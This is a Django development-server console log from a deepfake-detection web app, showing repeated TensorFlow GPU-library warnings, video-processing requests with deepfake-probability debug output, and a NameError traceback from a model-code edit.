2024-12-15 11:55:06.678303: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:55:06.678472: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:55:08.950247: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:55:08.950457: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:55:08.950556: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:55:08.951018: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:55:09
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:55:14.736931: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:55:14.736987: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:55:16.344674: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:55:16.344743: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:55:16.344777: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:55:16.345126: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:55:17
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 11:55:59] "GET /model_use/ HTTP/1.0" 200 3418
[15/Dec/2024 11:55:59] "GET /model_use/ HTTP/1.0" 200 3418
[15/Dec/2024 11:56:09] "POST /process_video/ HTTP/1.0" 200 3738
[15/Dec/2024 11:56:12] "GET / HTTP/1.0" 200 2347
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:56:40.085078: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:56:40.085137: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:56:41.714678: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:56:41.714754: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:56:41.714835: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:56:41.715176: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:56:42
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:57:08.154442: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:57:08.154500: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:57:09.737224: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:57:09.737283: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:57:09.737316: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:57:09.737666: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:57:10
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 11:57:10] "GET /model_use/ HTTP/1.0" 200 3418
[15/Dec/2024 11:57:20] "POST /process_video/ HTTP/1.0" 200 3688
[15/Dec/2024 11:57:56] "GET / HTTP/1.0" 200 2347
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 11:58:03.033252: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:58:03.033317: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 11:58:04.706668: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 11:58:04.706743: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 11:58:04.706819: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 11:58:04.707248: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 11:58:05
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 11:58:06] "GET /model_use/ HTTP/1.0" 200 3418
[15/Dec/2024 11:58:08] "GET /model_use/ HTTP/1.0" 200 3418
[15/Dec/2024 11:58:08] "GET /model_use/ HTTP/1.0" 200 3418
[15/Dec/2024 11:58:16] "POST /process_video/ HTTP/1.0" 200 3688
[15/Dec/2024 11:58:57] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 11:59:05] "POST /process_video/ HTTP/1.0" 200 3697
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:00:21.493138: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:00:21.493198: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:00:23.139130: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:00:23.139185: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:00:23.139220: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:00:23.139551: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:00:23
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 12:00:24] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 12:00:32] "POST /process_video/ HTTP/1.0" 200 3639
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:01:35.974240: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:01:35.974296: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:01:37.576114: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:01:37.576173: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:01:37.576207: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:01:37.576554: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:01:38
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 12:01:38] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 12:01:46] "POST /process_video/ HTTP/1.0" 200 3639
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:02:46.245562: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:02:46.245620: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:02:48.079014: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:02:48.079084: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:02:48.079124: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:02:48.079488: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:02:48
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:02:51.819825: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:02:51.819882: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:02:53.422632: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:02:53.422847: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:02:53.422953: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:02:53.423316: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:02:54
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 12:02:56] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 12:03:05] "POST /process_video/ HTTP/1.0" 200 3697
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:03:49.806868: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:03:49.806921: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:03:51.467212: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:03:51.467265: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:03:51.467298: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:03:51.467617: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:03:52
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 12:04:03] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 12:04:04] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 12:04:05] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 12:04:14] "POST /process_video/ HTTP/1.0" 200 3658
[15/Dec/2024 12:04:21] "GET /model_use/ HTTP/1.0" 200 3427
[15/Dec/2024 12:04:30] "POST /process_video/ HTTP/1.0" 200 3658
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:05:33.085842: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:05:33.085898: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:05:34.703946: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:05:34.704027: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:05:34.704064: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:05:34.704428: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:05:35
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

[15/Dec/2024 12:05:35] "GET /model_use/ HTTP/1.0" 200 3427
frame_predictions (before filtering): 딥페이크 확률: 1.00, 샘플링된 프레임 수: 10
[15/Dec/2024 12:05:44] "POST /process_video/ HTTP/1.0" 200 3667
/myproject/myproject/views.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:06:06.478335: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:06:06.478501: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:06:08.146594: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:06:08.146789: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:06:08.146883: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:06:08.147279: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:06:08
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

frame_predictions (before filtering): 딥페이크 확률: 1.00, 샘플링된 프레임 수: 10
[15/Dec/2024 12:10:18] "POST /process_video/ HTTP/1.0" 200 3667
frame_predictions (before filtering): 딥페이크 확률: 1.00, 샘플링된 프레임 수: 10
[15/Dec/2024 12:10:36] "POST /process_video/ HTTP/1.0" 200 3667
frame_predictions (before filtering): 딥페이크 확률: 0.30, 샘플링된 프레임 수: 10
frame_predictions (before filtering): 딥페이크 확률: 0.30, 샘플링된 프레임 수: 10
[15/Dec/2024 12:11:16] "POST /process_video/ HTTP/1.0" 200 3667
[15/Dec/2024 12:11:22] "GET /model_use/ HTTP/1.0" 200 3427
frame_predictions (before filtering): 딥페이크 확률: 1.00, 샘플링된 프레임 수: 10
[15/Dec/2024 12:11:42] "POST /process_video/ HTTP/1.0" 200 3667
[15/Dec/2024 12:25:49] "GET / HTTP/1.0" 200 2347
[15/Dec/2024 12:26:11] "GET /process_video/ HTTP/1.0" 200 3427
[15/Dec/2024 12:30:12] "GET /?max-keys=1 HTTP/1.0" 200 2347
[15/Dec/2024 12:30:12] "GET /?max-keys=5000 HTTP/1.0" 200 2347
/myproject/MesoNet_model/classifiers.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:33:13.859066: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:33:13.859129: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:33:15.453059: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:33:15.453463: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:33:15.453720: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:33:15.454187: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
System check identified no issues (0 silenced).
December 15, 2024 - 12:33:16
Django version 4.2.16, using settings 'myproject.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.

/myproject/MesoNet_model/classifiers.py changed, reloading.
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:36:06.994159: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:36:06.994345: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:36:08.564825: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:36:08.564879: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:36:08.564914: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:36:08.565241: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/commands/runserver.py", line 133, in inner_run
    self.check(display_num_errors=True)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/base.py", line 485, in check
    all_issues = checks.run_checks(
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/registry.py", line 88, in run_checks
    new_errors = check(app_configs=app_configs, databases=databases)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 14, in check_url_config
    return check_resolver(resolver)
  File "/usr/local/lib/python3.8/dist-packages/django/core/checks/urls.py", line 24, in check_resolver
    return check_method()
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 494, in check
    for pattern in self.url_patterns:
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 715, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/functional.py", line 57, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/usr/local/lib/python3.8/dist-packages/django/urls/resolvers.py", line 708, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib/python3.8/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1014, in _gcd_import
  File "<frozen importlib._bootstrap>", line 991, in _find_and_load
  File "<frozen importlib._bootstrap>", line 975, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 671, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 848, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/myproject/myproject/urls.py", line 21, in <module>
    from .views import process_video
  File "/myproject/myproject/views.py", line 10, in <module>
    from MesoNet_model import mesonet
  File "/myproject/MesoNet_model/mesonet.py", line 10, in <module>
    model = Meso4()
  File "/myproject/MesoNet_model/classifiers.py", line 30, in __init__
    self.model = self.init_model()
  File "/myproject/MesoNet_model/classifiers.py", line 40, in init_model
    x1 = Activation('swish')(x1)  # 활성화 함수 변경 (ReLU → Swish)
NameError: name 'Activation' is not defined
Watching for file changes with StatReloader
Performing system checks...

2024-12-15 12:36:41.338138: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:36:41.338309: I tensorflow/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.
2024-12-15 12:36:42.918250: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcuda.so.1'; dlerror: libcuda.so.1: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: /home/hbag9471/.local/lib/python3.8/site-packages/cv2/../../lib64:
2024-12-15 12:36:42.918605: W tensorflow/stream_executor/cuda/cuda_driver.cc:269] failed call to cuInit: UNKNOWN ERROR (303)
2024-12-15 12:36:42.918760: I tensorflow/stream_executor/cuda/cuda_diagnostics.cc:156] kernel driver does not appear to be running on this host (opensw): /proc/driver/nvidia/version does not exist
2024-12-15 12:36:42.919220: I tensorflow/core/platform/cpu_feature_guard.cc:151] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA
To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.
Exception in thread django-main-thread:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.8/threading.py", line 870, in run
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/autoreload.py", line 64, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/commands/runserver.py", line 133, in inner_run
    self.check(display_num_errors=True)
  File "/usr/local/lib/python3.8/dist-packages/django/core/management/base.py", line 485, in check
    all_issues = checks.run_checks(
